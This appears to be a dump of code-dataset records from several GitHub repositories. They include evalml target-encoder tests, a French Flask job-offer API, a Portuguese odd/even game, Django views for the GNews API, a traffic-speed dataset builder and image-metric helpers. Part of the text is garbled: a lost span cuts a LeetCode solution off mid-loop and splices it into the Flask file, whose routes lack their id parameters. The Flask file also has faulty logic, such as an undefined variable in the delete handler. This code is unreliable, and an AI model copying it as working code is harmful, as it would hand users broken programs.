attribute\"):\n encoder.categories\n\n\ndef test_invalid_inputs():\n with pytest.raises(ValueError, match=\"Invalid input 'test' for handle_unknown\"):\n TargetEncoder(handle_unknown=\"test\")\n with pytest.raises(ValueError, match=\"Invalid input 'test2' for handle_missing\"):\n TargetEncoder(handle_missing=\"test2\")\n with pytest.raises(\n ValueError,\n match=\"Smoothing value needs to be strictly larger than 0\",\n ):\n TargetEncoder(smoothing=0)\n\n\ndef test_null_values_in_dataframe():\n X = pd.DataFrame(\n {\n \"col_1\": [\"a\", \"b\", \"c\", \"d\", np.nan],\n \"col_2\": [\"a\", \"b\", \"a\", \"c\", \"b\"],\n \"col_3\": [\"a\", \"a\", \"a\", \"a\", \"a\"],\n },\n )\n X.ww.init(\n logical_types={\n \"col_1\": \"categorical\",\n \"col_2\": \"categorical\",\n \"col_3\": \"categorical\",\n },\n )\n y = pd.Series([0, 1, 1, 1, 0])\n encoder = TargetEncoder(handle_missing=\"value\")\n encoder.fit(X, y)\n X_t = encoder.transform(X)\n X_expected = pd.DataFrame(\n {\n \"col_1\": [0.6, 0.6, 0.6, 0.6, 0.6],\n \"col_2\": [0.526894, 0.526894, 0.526894, 0.6, 0.526894],\n \"col_3\": [\n 0.6,\n 0.6,\n 0.6,\n 0.6,\n 0.6,\n ],\n },\n )\n\n assert_frame_equal(X_expected, X_t)\n\n encoder = TargetEncoder(handle_missing=\"return_nan\")\n encoder.fit(X, y)\n X_t = encoder.transform(X)\n X_expected = pd.DataFrame(\n {\n \"col_1\": [0.6, 0.6, 0.6, 0.6, np.nan],\n \"col_2\": [0.526894, 0.526894, 0.526894, 0.6, 0.526894],\n \"col_3\": [\n 0.6,\n 0.6,\n 0.6,\n 0.6,\n 0.6,\n ],\n },\n )\n assert_frame_equal(X_expected, X_t)\n\n encoder = TargetEncoder(handle_missing=\"error\")\n with pytest.raises(ValueError, match=\"Columns to be encoded can not contain null\"):\n encoder.fit(X, y)\n\n\ndef test_cols():\n X = pd.DataFrame(\n {\n \"col_1\": [1, 2, 1, 1, 2] * 2,\n \"col_2\": [\"2\", \"1\", \"1\", \"1\", \"1\"] * 2,\n \"col_3\": [\"a\", \"a\", \"a\", \"a\", \"b\"] * 2,\n },\n )\n X_expected = X.astype({\"col_1\": \"int64\", \"col_2\": \"int64\", \"col_3\": \"category\"})\n y = pd.Series([0, 1, 1, 1, 0] * 2)\n encoder = TargetEncoder(cols=[])\n encoder.fit(X, y)\n X_t = encoder.transform(X)\n assert_frame_equal(X_expected, X_t)\n\n encoder = TargetEncoder(cols=[\"col_3\"])\n encoder.fit(X, y)\n X_t = encoder.transform(X)\n X_expected = pd.DataFrame(\n {\n \"col_1\": pd.Series([1, 2, 1, 1, 2] * 2, dtype=\"int64\"),\n \"col_2\": [2, 1, 1, 1, 1] * 2,\n \"col_3\": pd.Series(\n [0.749863, 0.749863, 0.749863, 0.749863, 0.161365] * 2,\n dtype=\"float64\",\n ),\n },\n )\n assert_frame_equal(X_expected, X_t, rtol=1e-3)\n\n encoder = TargetEncoder(cols=[\"col_3\"])\n encoder.fit(X, y)\n X_t = encoder.transform(X)\n encoder2 = TargetEncoder()\n encoder2.fit(X, y)\n X_t2 = encoder2.transform(X)\n assert_frame_equal(X_t, X_t2)\n\n\ndef test_transform():\n X = pd.DataFrame(\n {\n \"col_1\": [1, 2, 1, 1, 2],\n \"col_2\": [\"r\", \"t\", \"s\", \"t\", \"t\"],\n \"col_3\": [\"a\", \"a\", \"a\", \"b\", \"a\"],\n },\n )\n X.ww.init(logical_types={\"col_2\": \"categorical\", \"col_3\": \"categorical\"})\n y = pd.Series([0, 1, 1, 1, 0])\n encoder = TargetEncoder()\n encoder.fit(X, y)\n X_t = encoder.transform(X)\n X_expected = pd.DataFrame(\n {\n \"col_1\": pd.Series([1, 2, 1, 1, 2], dtype=\"int64\"),\n \"col_2\": [0.6, 0.65872, 0.6, 0.65872, 0.65872],\n \"col_3\": [0.504743, 0.504743, 0.504743, 0.6, 0.504743],\n },\n )\n assert_frame_equal(X_expected, X_t)\n\n\ndef test_smoothing():\n # larger smoothing values should bring the values closer to the global mean\n X = pd.DataFrame(\n {\n \"col_1\": [1, 2, 1, 1, 2],\n \"col_2\": [2, 1, 1, 1, 1],\n \"col_3\": [\"a\", \"a\", \"a\", \"a\", \"b\"],\n },\n )\n X.ww.init(logical_types={\"col_3\": \"categorical\"})\n y = pd.Series([0, 1, 1, 1, 0])\n encoder = TargetEncoder(smoothing=1)\n encoder.fit(X, y)\n X_t = encoder.transform(X)\n X_expected = pd.DataFrame(\n {\n \"col_1\": pd.Series([1, 2, 1, 1, 2], dtype=\"int64\"),\n \"col_2\": pd.Series([2, 1, 1, 1, 1], dtype=\"int64\"),\n \"col_3\": [0.742886, 0.742886, 0.742886, 0.742886, 0.6],\n },\n )\n assert_frame_equal(X_expected, X_t)\n\n encoder = TargetEncoder(smoothing=10)\n encoder.fit(X, y)\n X_t = encoder.transform(X)\n X_expected = pd.DataFrame(\n {\n \"col_1\": pd.Series([1, 2, 1, 1, 2], dtype=\"int64\"),\n \"col_2\": pd.Series([2, 1, 1, 1, 1], dtype=\"int64\"),\n \"col_3\": [0.686166, 0.686166, 0.686166, 0.686166, 0.6],\n },\n )\n assert_frame_equal(X_expected, X_t)\n\n encoder = TargetEncoder(smoothing=100)\n encoder.fit(X, y)\n X_t = encoder.transform(X)\n X_expected = pd.DataFrame(\n {\n \"col_1\": pd.Series([1, 2, 1, 1, 2], dtype=\"int64\"),\n \"col_2\": pd.Series([2, 1, 1, 1, 1], dtype=\"int64\"),\n \"col_3\": [0.676125, 0.676125, 0.676125, 0.676125, 0.6],\n },\n )\n assert_frame_equal(X_expected, X_t)\n\n\ndef test_get_feature_names():\n X = pd.DataFrame(\n {\n \"col_1\": [1, 2, 1, 1, 2],\n \"col_2\": [\"r\", \"t\", \"s\", \"t\", \"t\"],\n \"col_3\": [\"a\", \"a\", \"a\", \"b\", \"a\"],\n },\n )\n y = pd.Series([0, 1, 1, 1, 0])\n encoder = TargetEncoder()\n with pytest.raises(\n ComponentNotYetFittedError,\n match=\"This TargetEncoder is not fitted yet. You must fit\",\n ):\n encoder.get_feature_names()\n encoder.fit(X, y)\n np.testing.assert_array_equal(\n encoder.get_feature_names(),\n np.array([\"col_1\", \"col_2\", \"col_3\"]),\n )\n\n\n@patch(\"evalml.pipelines.components.transformers.transformer.Transformer.fit\")\ndef test_pandas_numpy(mock_fit, X_y_binary):\n X, y = X_y_binary\n X = pd.DataFrame(X).sample(frac=1)\n\n encoder = TargetEncoder()\n\n encoder.fit(X, y)\n assert_frame_equal(mock_fit.call_args[0][0], X)\n\n X_numpy = X.to_numpy()\n encoder.fit(X_numpy, y)\n\n\n@pytest.mark.parametrize(\n \"X_df\",\n [\n pd.DataFrame(\n pd.to_datetime([\"20190902\", \"20200519\", \"20190607\"], format=\"%Y%m%d\"),\n ),\n pd.DataFrame(pd.Series([1, 2, 3], dtype=\"Int64\")),\n pd.DataFrame(pd.Series([1.0, 2.0, 3.0], dtype=\"float\")),\n pd.DataFrame(pd.Series([\"a\", \"b\", \"a\"], dtype=\"category\")),\n pd.DataFrame(pd.Series([True, False, True], dtype=\"boolean\")),\n pd.DataFrame(\n pd.Series(\n [\"this will be a natural language column because length\", \"yay\", \"hay\"],\n dtype=\"string\",\n ),\n ),\n ],\n)\ndef test_target_encoder_woodwork_custom_overrides_returned_by_components(X_df):\n y = pd.Series([1, 2, 1])\n override_types = [Integer, Double, Categorical, NaturalLanguage, Boolean, Datetime]\n for logical_type in override_types:\n try:\n X = X_df.copy()\n X.ww.init(logical_types={0: logical_type})\n except (ww.exceptions.TypeConversionError, ValueError, TypeError):\n continue\n\n encoder = TargetEncoder()\n encoder.fit(X, y)\n transformed = encoder.transform(X, y)\n assert isinstance(transformed, pd.DataFrame)\n\n if logical_type == Categorical:\n assert {k: type(v) for k, v in transformed.ww.logical_types.items()} == {\n 0: Double,\n }\n else:\n assert {k: type(v) for k, v in transformed.ww.logical_types.items()} == {\n 0: logical_type,\n }\n","repo_name":"alteryx/evalml","sub_path":"evalml/tests/component_tests/test_target_encoder.py","file_name":"test_target_encoder.py","file_ext":"py","file_size_in_byte":8914,"program_lang":"python","lang":"en","doc_type":"code","stars":664,"dataset":"github-code","pt":"32"} +{"seq_id":"9942038940","text":"class Solution:\n def findDiagonalOrder(self, mat: List[List[int]]) -> List[int]:\n iteration = 0\n i, j = 0, 1\n res = []\n while i', methods=['GET'])\ndef get_offre(id):\n # Par defaut si l id n est pas trouve, on renvoi 404. Si il est trouve on envoi code 200 avec l enreistrement\n response = jsonify(Offre.query.get_or_404(id).to_dict())\n response.status_code = 200\n response.headers['Location'] = url_for('api.get_offre', id=id)\n return response\n\n\n\n@bp.route('/offres', methods=['POST'])\n@token_auth.login_required\ndef create_offre():\n data = request.get_json() or {}\n # verification si l offre existe deja\n if ('title' in data) and ('salary' in data) and ('contact' in data) and ('description' in data) and ('categorie_id' in data) and ('entreprise_id' in data) and ('dd' in data) :\n if ( (Offre.query.filter_by(title=data['title']).first()) and (Offre.query.filter_by(contact=data['contact']).first()) and (Offre.query.filter_by(salary=data['salary']).first()) ):\n #Offre et contact déja existants, forte probabilite de duplicat: code 409\n return error_response(409, 'same title, salary and contact manager as other offre. Please modify to avoid duplicates')\n else:\n return bad_request('must include title, salary, description, dd: depot date of offre, dl: limite date of offre, categorie_id and entreprise_id fields')\n # Pour créér une offre, il faut appartenir a cette meme company ou etre root\n # l USER cree une offre pour une autre société que la sienne\n if (((token_auth.current_user()).company == Entreprise.get_entrepriseNamebyId(int(data['entreprise_id']))) or (token_auth.current_user().id == User.get_UserId('root'))) :\n offre = Offre()\n #il s agit d une nouvelle offre, renvoi code 201 avec location de l enregistrement\n for field in ['title', 'salary', 'contact', 'description', 'categorie_id', 'entreprise_id']:\n if field in data:\n setattr(offre, field, data[field])\n try:\n offre.dd = datetime.strptime(data['dd'], '%Y%m%d')\n except:\n offre.dd = date.today()\n try:\n offre.dl = datetime.strptime(data['dl'], '%Y%m%d')\n except:\n # si dl absent, on genere une erreur et on rajoute 12 mois\n offre.dl = date.today()+ relativedelta(months=12)\n #offre.from_dict(data, new_offre=True)\n db.session.add(offre)\n db.session.commit()\n # on envoi code 201 avec l enregistrement\n response = jsonify(offre.to_dict())\n response.status_code = 201\n response.headers['Location'] = url_for('api.get_offre', id=offre.id)\n return response\n else:\n abort(403)\n\n\n\n\n@bp.route('/offres/', methods=['PATCH'])\n@token_auth.login_required\ndef update_offre(id):\n #l offre existe ou pas\n offre = Offre.query.get_or_404(id)\n\n #Uniquement accès pour root ou l auteur meme company que l offre\n if ((token_auth.current_user().company == get_EntrepriseNameByOffreId(id)) or (token_auth.current_user().id == User.get_UserId('root'))) :\n # L id donné correspond à l'état des registres, sinon 404\n # je ne prends pas en charge la creation de ressource si l id n existe pas\n data = request.get_json() or {}\n if (('entreprise_id' in data and (int(data['entreprise_id'])!=offre.entreprise_id))) :\n #l entreprise ne peut etre changé: code 403\n # tous les autres champs peuvent etre update\n return error_response(403, 'cannot change entreprise field')\n # L' update est valide, je remplace tout la ressource: ce n est pas un PATCH\n for field in ['title', 'salary', 'contact', 'description', 'categorie_id']:\n if field in data:\n setattr(offre, field, data[field])\n if ('dd' in data):\n try:\n offre.dd = datetime.strptime(data['dd'], '%Y%m%d')\n except:\n offre.dd = date.today()\n if ('dl' in data):\n try:\n offre.dl = datetime.strptime(data['dd'], '%Y%m%d')\n except:\n offre.dl = date.today()+ relativedelta(months=6)\n #offre.from_dict(data, new_offre=False)\n db.session.commit()\n # on envoi code 200 avec l enregistrement\n response = jsonify(offre.to_dict())\n response.status_code = 200\n response.headers['Location'] = url_for('api.get_offre', id=offre.id)\n return response\n else:\n abort(403)\n\n\n@bp.route('/offres/', methods=['DELETE'])\n@token_auth.login_required\ndef delete_offre(id):\n #l offre existe ou pas\n offre = Offre.query.get_or_404(id)\n #Uniquement accès pour root ou l auteur meme company que l offre\n if ((token_auth.current_user().company == get_EntrepriseNameByOffreId(id)) or (token_auth.current_user().id == User.get_UserId('root'))) :\n # L id donné correspond à l'état des registres, sinon 404\n print(Offre.query.filter(Offre.id==int(bid)))\n print(User.query.filter(User.company== Entreprise.get_entrepriseNamebyId(get_EntrepriseNameByOffreId(id))))\n if (offre.delete_O(offre.id) == 1):\n # L opération a réussi, pas de body pour un delete\n return '', 204\n else:\n # En cas, ou la methode ne peut se faire ou qu'elle n est pas dans les cas 204 et 404\n abort(500)\n else:\n abort(403)\n","repo_name":"NZ26-06/TinyApec","sub_path":"tuto/api/offres.py","file_name":"offres.py","file_ext":"py","file_size_in_byte":7073,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21275864361","text":"from random import randint\nfrom time import sleep\nfrom emoji import emojize\nvitoria=0\nprint('=-='*15)\nprint(emojize('\\033[35mVAMOS JOGAR PAR:victory_hand: OU IMPAR:index_pointing_up:\\033[m'))\nprint('=-='*15)\nwhile True:\n jogador=int(input('Digite um valor: '))\n computador=randint(0, 10)\n total = jogador+computador\n tipo=' '\n while tipo not in 'P,I':\n tipo=str(input('Par ou Impar? [P/I]: ')).strip().upper()[0]\n print(f'Você jogou {jogador} e o computador jogou {computador}. Total de {total}')\n if total % 2 == 0:\n print('DEU PAR')\n else:\n print('DEU IMPAR')\n if tipo == 'P':\n if total % 2 == 0:\n print('\\033[32mVOCÊ VENCEU!\\033[m')\n vitoria+=1\n else:\n print('\\033[31mVOCÊ PERDEU!\\033[m')\n break\n if tipo == 'I':\n if total % 2 == 1:\n print('\\033[32mVOCÊ VENCEU!\\033[m')\n vitoria+=1\n else:\n print('\\033[31mVOCÊ PERDEU!\\033[m')\n break\n print('==='*15)\n print('Vamos jogar novamente...')\n print('==='*15)\n sleep(2)\nprint(emojize(f'\\033[31m:police_car_light:GAME OVER:police_car_light:\\033[mVocê ganhou {vitoria} vezes.'))","repo_name":"Jorgemartin2/Pequenos_projetos","sub_path":"Projetos/JogoParOuImpar.py","file_name":"JogoParOuImpar.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"43569215059","text":"# https://school.programmers.co.kr/learn/courses/30/lessons/120847\n\n\n# 정렬을 사용한 방법\ndef solution_01(numbers):\n temp_list = sorted(numbers)\n answer = temp_list[-1] * temp_list[-2]\n return answer\n\n\n# 조합을 사용한 방법\nimport itertools\n\n\ndef solution_02(numbers):\n comb = list(itertools.combinations(numbers, 2))\n answer = 0\n for i1, i2 in comb:\n if i1 * i2 > answer:\n answer = i1 * i2\n return answer\n","repo_name":"NullisnotFalse/coding_test_prac","sub_path":"2023_05/230516_01.py","file_name":"230516_01.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7553975386","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, JsonResponse\nfrom django.views.decorators.cache import cache_page\nimport requests\n\n\nimport json\ndef getApiKey():\n with open('config.json') as f:\n config = json.load(f)\n \n api_key = config['api_key']\n return api_key\n\n\n\n@cache_page(60 * 15) # Cache the response for 15 minutes\ndef get_articles(request):\n \"\"\"\n The function `get_articles` retrieves a specified number of top headlines articles from the GNews\n API based on the given parameters and returns them as a JSON response.\n \n :param request: The `request` parameter is an object that represents the HTTP request made by the\n client. It contains information such as the request method, headers, query parameters, and body\n :return: a rendered HTML template called 'article_list.html' with a context variable 'articles'\n containing a list of articles obtained from the GNews API.\n \"\"\"\n\n n = request.GET.get('n', 10)\n ln = request.GET.get('ln', 'en')\n category = request.GET.get('category', 'general')\n country = request.GET.get('country', 'us')\n apikey = getApiKey()\n url = f\"https://gnews.io/api/v4/top-headlines?category={category}&lang={ln}&country={country}&max={n}&apikey={apikey}\"\n response = requests.get(url)\n articles = response.json().get('articles', [])\n\n articles = response.json().get('articles', [])\n return render(request, 'article_list.html', {'articles': articles})\n\n\n@cache_page(60 * 15) # Cache the response for 15 minutes\ndef search_article(request):\n \"\"\"\n The function `get_articles_by_author` retrieves a list of articles from the GNews API based on the\n provided query parameters and renders them in an HTML template.\n \n :param request: The `request` parameter is an object that represents the HTTP request made by the\n client. It contains information such as the request method, headers, and query parameters\n :return: a rendered HTML template called 'article_list.html' with a context variable 'articles'\n containing a list of articles obtained from the GNews API based on the provided parameters.\n \"\"\"\n apikey = getApiKey()\n ln = request.GET.get('ln', 'en')\n country = request.GET.get('country', 'us')\n query = request.GET.get('query', '')\n max_articles = request.GET.get('max', 10)\n source = request.GET.get('queryBy', \"title\")\n url = f\"https://gnews.io/api/v4/search?q={query}&lang={ln}&country={country}&max={max_articles}&in={source}&apikey={apikey}\"\n response = requests.get(url)\n articles = response.json().get('articles', [])\n return render(request, 'article_list.html', {'articles': articles})\n\n\ndef home(request):\n \"\"\"\n The `home` function returns a rendered `home.html` template in response to a request.\n \n :param request: The request parameter is an object that represents the HTTP request made by the\n client. It contains information such as the HTTP method (GET, POST, etc.), headers, user session,\n and any data sent in the request. In this code snippet, the request object is passed to the render\n function, which\n :return: the rendered home.html template.\n \"\"\"\n return render(request,'home.html')","repo_name":"ani3198/newsApi","sub_path":"news_api_project/news_api_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29812463695","text":"import glob\nimport tempfile\n\nfrom sklearn.preprocessing import OneHotEncoder, OrdinalEncoder\nimport numpy as np\nfrom fastparquet import ParquetFile\nfrom src.utils.tensor import get_mask_from_numpy_tensor\n\n\nclass DatasetBuilder:\n MAX_SPEED_CATS = [5., 10., 20., 30., 40., 50., 60.0, 70.0, 80.0, 100.0, 120.0]\n NUM_LANES_CATS = [1., 2., 3., 4., 5.]\n NUM_FEATS = 53\n\n def __init__(self, g):\n self.enc = OneHotEncoder(handle_unknown='ignore', categories=[\n ['access_ramp', 'corridor', 'living_street', 'platform', 'primary',\n 'residential', 'secondary', 'secondary_link', 'service',\n 'tertiary', 'tertiary_link', 'unclassified'], ['asphalt', 'cobblestone',\n 'cobblestone:flattened', 'concrete',\n 'concrete:plates', 'grass_paver', 'no_sur',\n 'paved',\n 'paving_stones', 'sett'],\n ['DirtRoad', 'LocalRoad', 'MajorRoad'],\n range(0, 24)\n ])\n\n self.ienc = OrdinalEncoder(\n categories=[self.MAX_SPEED_CATS, self.NUM_LANES_CATS])\n\n self.g = g\n\n def _arc_features(self, arc, timestep):\n arc = self.g[arc[0]][arc[1]]\n try:\n max_speed_feature = float(arc['data'].metadata.get('maxspeed', '50'))\n max_speed_feature = min(self.MAX_SPEED_CATS,\n key=lambda x: abs(x - max_speed_feature))\n except:\n max_speed_feature = 50.\n try:\n num_lanes_feature = int(arc['data'].metadata.get('lanes', '1'))\n num_lanes_feature = min(self.NUM_LANES_CATS,\n key=lambda x: abs(x - num_lanes_feature))\n except:\n num_lanes_feature = 1\n\n return [\n arc['data'].metadata['highway'],\n arc['data'].metadata.get('surface', 'no_sur'),\n arc['data'].roadClass.name,\n timestep % 24\n ], [max_speed_feature, num_lanes_feature]\n\n def _construct_features(self, L):\n data = list()\n data_ord = list()\n for node in L.nodes:\n data.append(self._arc_features(node)[0])\n data_ord.append(self._arc_features(node)[1])\n return self.enc.fit_transform(data), self.ienc.fit_transform(data_ord)\n\n def _build_dataset_to_numpy_tensor(self, from_, to, df=None, id_to_idx=None):\n \"\"\"We extract features from speed (actual speed, whether speed is missing)\n and combine with static features.\n\n Args:\n from_ (int): from time step\n to (int): to time step\n df (Pandas.DataFrame): the dataframe contains (only) speed data\n id_to_idx (dict): dictionary of segment_id --> df.indices\n\n Returns:\n np.ndarray: dataset tensor of shape [num_time_steps, num_nodes, num_features]\n\n \"\"\"\n\n dataset = np.empty([to - from_, len(df), self.NUM_FEATS])\n for t in range(from_, to):\n cat_features_at_t = [['primary', 'asphalt', 'MajorRoad', t % 24]] * len(df)\n ord_features_at_t = [[50.0, 4]] * len(df)\n speed_features_at_t = [50] * len(df)\n speed_is_nan_feature = [1] * len(df)\n for _, row in df.iterrows():\n arc = (int(row['from_node']), int(row['to_node']))\n cat_features_at_t[id_to_idx[arc]], ord_features_at_t[id_to_idx[arc]] = \\\n self._arc_features(arc, timestep=t)\n speed_features_at_t[id_to_idx[arc]] = row[str(t)]\n if np.isnan(row[str(t)]):\n speed_is_nan_feature[id_to_idx[arc]] = 0\n dataset[t - from_] = np.concatenate([np.array(speed_features_at_t).reshape(-1, 1),\n np.array(speed_is_nan_feature).reshape(-1, 1),\n self.ienc.fit_transform(ord_features_at_t),\n self.enc.fit_transform(cat_features_at_t).toarray()], axis=1)\n return dataset\n\n def _generate_dataset_concat(self, X, X_mask, num_lookback, num_lookahead, memmap=False):\n \"\"\"\n Takes node features for the graph and divides them into multiple samples\n along the time-axis by sliding a window of size (num_timesteps_input+\n num_lookahead) across it in steps of 1.\n Args:\n X: Node features of shape (num_vertices, num_features, num_timesteps)\n X_mask: same shape with X, but contains Mask info\n num_lookback: number of timesteps to look back\n num_lookahead: number of timesteps to look ahead\n memmap (bool): whether to use memmap for contructing the array\n\n Returns:\n Node data (features + labels) divided into multiple samples. Shape is\n (num_samples, num_vertices, num_features, num_timesteps_input).\n \"\"\"\n # Generate the beginning index and the ending index of a sample, which\n # contains (num_points_for_training + num_points_for_predicting) points\n indices = [(i, i + (num_lookback + num_lookahead)) for i\n in range(X.shape[2] - (\n num_lookback + num_lookahead) + 1)]\n # Save samples\n if memmap:\n with tempfile.NamedTemporaryFile() as ff:\n features = np.memmap(filename=ff, shape=(len(indices), len(X), self.NUM_FEATS,\n num_lookback), dtype=np.double)\n with tempfile.NamedTemporaryFile() as ft:\n target = np.memmap(filename=ft, shape=(len(indices), len(X), num_lookahead),\n dtype=np.double)\n with tempfile.NamedTemporaryFile() as fm:\n mask = np.memmap(filename=fm, shape=(len(indices), len(X), num_lookahead),\n dtype=np.double)\n\n else:\n features = np.empty([len(indices), len(X), self.NUM_FEATS, num_lookback], dtype=np.double)\n target = np.empty([len(indices), len(X), num_lookahead], dtype=np.double)\n mask = np.empty([len(indices), len(X), num_lookahead], dtype=np.double)\n\n for k, (i, j) in enumerate(indices):\n # num_vertices, num_features, num_timesteps\n features[k] = X[:, :, i: i + num_lookback]\n target[k] = X[:, 0, i + num_lookback: j]\n mask[k] = X_mask[:, 0, i + num_lookback: j]\n\n return np.array(features), np.array(target), np.array(mask)\n\n def train_validation_test_split(self, X, X_filled, X_masked, look_back=29, look_ahead=1, split_ratio=None,\n memmap=False):\n # num_vertices, num_features, num_timesteps\n if split_ratio is None:\n split_ratio = [0.7, 0.9]\n split_line1 = int(X.shape[2] * split_ratio[0])\n split_line2 = int(X.shape[2] * split_ratio[1])\n train_original_data = X_filled[:, :, :split_line1]\n val_original_data = X_filled[:, :, split_line1:split_line2]\n test_original_data = X_filled[:, :, split_line2:]\n\n train_mask = X_masked[:, :, :split_line1]\n valid_mask = X_masked[:, :, split_line1:split_line2]\n test_mask = X_masked[:, :, split_line2:]\n\n # num_samples, num_nodes, num_timesteps, num_features\n training_data, training_target, train_mask = self._generate_dataset_concat(train_original_data, train_mask,\n num_lookback=look_back,\n num_lookahead=look_ahead,\n memmap=memmap)\n valid_data, valid_target, valid_mask = self._generate_dataset_concat(val_original_data, valid_mask,\n num_lookback=look_back,\n num_lookahead=look_ahead,\n memmap=memmap)\n test_data, test_target, test_mask = self._generate_dataset_concat(test_original_data, test_mask,\n num_lookback=look_back,\n num_lookahead=look_ahead,\n memmap=memmap)\n\n data = {'train': training_data, 'valid': valid_data, 'test': test_data}\n target = {'train': training_target, 'valid': valid_target, 'test': test_target}\n mask = {'train': train_mask, 'valid': valid_mask, 'test': test_mask}\n return data, target, mask\n\n def _remove_non_existing_edges_from_df(self, df):\n for idx, row in df.iterrows():\n arc = (int(row['from_node']), int(row['to_node']))\n if not self.g.has_edge(arc[0], arc[1]) or not self.g.has_node(arc[0]) or not self.g.has_node(arc[1]):\n df.drop(idx, inplace=True)\n return df\n\n def load_speed_data(self, file_path):\n file_path = glob.glob(f'{file_path}/*snappy.parquet')\n pf = ParquetFile(file_path)\n df = pf.to_pandas()\n df = self._remove_non_existing_edges_from_df(df)\n edges = [tuple((int(x[0]), int(x[1]))) for x in df[['from_node', 'to_node']].values]\n return edges, df\n\n def construct_batches(self, df, L, TOTAL_T_STEPS=2263, memmap=False):\n id_to_idx = {}\n\n for idx, id_ in enumerate(L.nodes()):\n id_to_idx[id_] = idx\n\n df_filled = df.loc[:, df.columns != 'from_node']\n df_filled = df_filled.loc[:, df_filled.columns != 'to_node']\n\n # df_filled = df_filled.interpolate(method='nearest', axis=1)\n df_filled = df_filled.fillna(df_filled.mean())\n df_filled = df_filled.fillna(13.8)\n\n speed_columns = list(map(str, range(TOTAL_T_STEPS)))\n df.columns = ['from_node', 'to_node'] + speed_columns\n df_filled.columns = speed_columns\n df_filled['from_node'] = df['from_node']\n df_filled['to_node'] = df['to_node']\n\n df_filled = df_filled[['from_node', 'to_node'] + speed_columns[TOTAL_T_STEPS - 400:]]\n df = df[['from_node', 'to_node'] + speed_columns[TOTAL_T_STEPS - 400:]]\n\n X = self._build_dataset_to_numpy_tensor(df=df,\n id_to_idx=id_to_idx,\n from_=TOTAL_T_STEPS - 400,\n to=TOTAL_T_STEPS)\n X_filled = self._build_dataset_to_numpy_tensor(df=df_filled,\n id_to_idx=id_to_idx,\n from_=TOTAL_T_STEPS - 400,\n to=TOTAL_T_STEPS)\n\n X = np.moveaxis(X, source=(0, 1, 2), destination=(2, 0, 1))\n X_filled = np.moveaxis(X_filled, source=(0, 1, 2), destination=(2, 0, 1))\n # Build mask tensor\n X_masked = get_mask_from_numpy_tensor(X)\n\n data, target, mask = self.train_validation_test_split(X=X, X_filled=X_filled, X_masked=X_masked, memmap=memmap)\n\n return data, target, mask\n","repo_name":"tumeteor/ST-GCN","sub_path":"src/data_loader/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":11584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30763720225","text":"\"\"\"\nStartup da aplicacao.\n\"\"\"\n\nfrom flasgger.base import Swagger\nfrom controller.rest import create_app\n\napp = create_app('config.default')\napp.config['SWAGGER'] = {\n \"swagger_version\": \"2.0\",\n \"specs\": [\n {\n \"version\": \"1.0.0\",\n \"title\": \"Agrines S3AIR\",\n \"endpoint\": 'v1_spec',\n \"route\": '/',\n \"description\": \"Api CORE do Pagamento Escritural.\"\n }\n ]\n}\n\nSwagger(app)\n\nif __name__ == \"__main__\":\n app.run(debug=True, host='0.0.0.0')\n","repo_name":"rangeltorrezan/agrines-hackaton","sub_path":"wsgi.py","file_name":"wsgi.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14694461850","text":"from skimage.metrics import structural_similarity as ssim\nfrom PIL import Image\nimport numpy as np\nfrom skimage.metrics import peak_signal_noise_ratio as psnr\nfrom skimage.metrics import mean_squared_error as mse\n\nimport lpips\n\n\ndef calc_ssim(img1_path, img2_path,num):\n\n ssim_score = 0\n for i in range(num):\n path1 = img1_path + \"rel_\" + str(i) + \".png\"\n path2 = img2_path + \"res_\" + str(i) + \".png\"\n img1 = Image.open(path1).convert('L')\n img2 = Image.open(path2).convert('L')\n img1, img2 = np.array(img1), np.array(img2)\n ssim_score += ssim(img1, img2, data_range=255)\n return ssim_score/num\n\n\ndef calc_psnr(img1_path, img2_path,num):\n psnr_score = 0\n for i in range(num):\n path1 = img1_path + \"rel_\" + str(i) + \".png\"\n path2 = img2_path + \"res_\" + str(i) + \".png\"\n img1 = Image.open(path1)\n img2 = Image.open(path2)\n img1, img2 = np.array(img1)/255, np.array(img2)/255\n psnr_score += psnr(img1, img2, data_range=1)\n return psnr_score/num\n\ndef calc_mse(img1_path, img2_path,num):\n mse_score = 0\n for i in range(num):\n path1 = img1_path + \"rel_\" + str(i) + \".png\"\n path2 = img2_path + \"res_\" + str(i) + \".png\"\n img1 = Image.open(path1)\n img2 = Image.open(path2)\n img1, img2 = np.array(img1)/255, np.array(img2)/255\n\n mse_score += mse(img1, img2)\n return mse_score/num\n\n\nloss_fn = lpips.LPIPS(net='alex')\ndef calc_lpips(img1_path, img2_path,num):\n dist01 = 0\n for i in range(num):\n path1 = img1_path + \"rel_\" + str(i) + \".png\"\n path2 = img2_path + \"res_\" + str(i) + \".png\"\n # Load images\n img0 = lpips.im2tensor(lpips.load_image(path1)) # RGB image from [-1,1]\n img1 = lpips.im2tensor(lpips.load_image(path2))\n dist01 += loss_fn.forward(img0, img1)\n return dist01/num\n\n\n\nclass util_of_lpips():\n def __init__(self, net, use_gpu=False):\n\n self.use_gpu = use_gpu\n if use_gpu:\n self.loss_fn.cuda()\n\n \n\n","repo_name":"Inawa/DecodeNet","sub_path":"compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7699611898","text":"from heapq import *\n\nclass Solution:\n def connectSticks(self, sticks: List[int]) -> int:\n heapify(sticks)\n \n res = 0\n while len(sticks) > 1:\n x, y = heappop(sticks), heappop(sticks)\n res += (x + y)\n heappush(sticks, x+y)\n \n return res","repo_name":"DarshanGowda0/LC-Grind","sub_path":"Daily-Grind/19.py","file_name":"19.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} 